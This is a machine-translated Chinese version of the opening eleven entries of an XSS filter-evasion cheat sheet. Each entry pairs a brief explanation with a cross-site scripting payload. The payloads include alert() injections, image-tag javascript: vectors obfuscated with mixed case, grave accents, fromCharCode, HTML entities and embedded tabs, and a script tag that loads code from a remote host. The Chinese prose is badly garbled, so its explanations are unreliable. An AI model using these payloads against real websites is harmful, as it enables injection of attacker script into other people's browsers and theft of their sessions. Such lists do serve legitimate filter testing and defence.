1.XSS定位器。注射这根弦,而且在大多数情况下,脚本是脆弱的,没有特殊要求XSS向量单词“XSS”会流行起来。使用计算器下面网址(URL)编码的编码整个字符串。提示:如果你在垫子,需要快速检查一页,多次注射贬值" <PLAINTEX>“标签就足以去看看一些易受XSS的输出略微把房间弄得乱七八糟。

 

 实例:';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

2.SSS定位器2。如果你没有多少空间和知没有脆弱的JavaScript页面上,该字符串是一个很好的紧凑XSS注射检查。查看源注入后它,并且寻找&lt XSS诗句,< XSS看看它是脆弱的

 

代码:'';!--"<XSS>=&{()}

3.没有滤镜迴避。这是一个正常的XSS JavaScript注射,最容易被逮住了,但我建议尝试它第一次(引号不需要在任何现代浏览器,所以他们被忽略了这里)

代码:<SCRIPT SRC=www.xxx.xom/xss.js></SCRIPT>

4.使用图像XSS JavaScript指令(IE7.0不支持JavaScript指令在上下文的一个形象,但它在其他场合,但下列显示原理工作,这将在其他标签——我可能会修改本在以后的日子里)

  代码:1)<IMG SRC="javascript:alert('XSS');">

              2)<IMG SRC=javascript:alert('XSS')>

             3)<IMG SRC=JaVaScRiPt:alert('XSS')>

             4)<IMG SRC=javascript:alert(&quot;XSS&quot;)>

5.口音含糊不清的坟墓(如果你需要同时使用单引号增加了一倍,你可以使用一个坟墓的口音来封装JavaScript字符串-这也是有用的,因为很多跨站脚本过滤器不知道严重口音)

代码:<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

6.畸形图片标签。Begeek最初发现(但清理干净,缩短工作在所有的浏览器),该XSS向量采用轻松渲染器来创造我们XSS向量在一个图片标签应封装在引号。我猜这是原来的意思是到正确的邋遢的代码。这将使它更明显的很难正确地解析HTML标签

 代码:<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

7.fromCharCode(如果没有任何类型的引用允许():你可以在fromCharCode JavaScript创造任何XSS向量你需要)

代码:<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

8.utf - 8的字符编码标准编码的例子,使用javascript XSS指令里面的一个<图片标签并不会在火狐或n etscape4 . +在壁虎渲染器模式)。使用XSS计算器,以获取更多信息

代码:<IMGSRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

<IMGSRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

9.无分号(十六进制编码这也是一个可行的XSS***上述字符串$tmp_string= ~ s /。* \ & #(\ d +);。* / 1$/,假设有一个数字字符以下英镑符号-这是不符合事实的利用六角HTML字符)。使用XSS计算器,以获取更多信息

 代码:<IMGSRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

10.嵌入式标签打破了跨站脚本***

代码:<IMG SRC="jav ascript:alert('XSS');">

11.嵌入式编码标签分手XSS

代码:<IMG SRC="jav&#x09;ascript:alert('XSS');">